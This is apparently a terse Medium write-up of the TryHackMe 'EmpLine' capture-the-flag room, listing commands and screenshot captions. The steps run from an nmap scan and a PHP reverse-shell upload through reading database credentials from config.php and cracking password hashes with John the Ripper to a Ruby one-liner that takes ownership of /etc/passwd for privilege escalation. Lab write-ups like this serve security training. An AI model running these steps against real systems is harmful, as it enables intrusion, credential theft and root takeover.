EmpLine | TryHackMe

nmap -sS -T4 -sV -sC $ip
nmap scan
empline default webpage
10.10.10.10   job.empline.thm empline.thm
cp /usr/share/webshells/php/php-reverse-shell.php ./
vi php-reverse-shell.php
reverse shell
config.php credentials
mysql -uusername -p -h10.10.10.10
-u is username (if the name was bob you would use -ubob)
-p denotes that you will be prompted for the password
-h specifies that you will connect to a remote DB at this IP address
mysql connection
password hashes
john the ripper
user.txt
scp $(locate linpeas.sh) usernameyoufound@10.10.103.182:./
ruby -e 'File.chown(1002,1002,"/etc/passwd")'

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store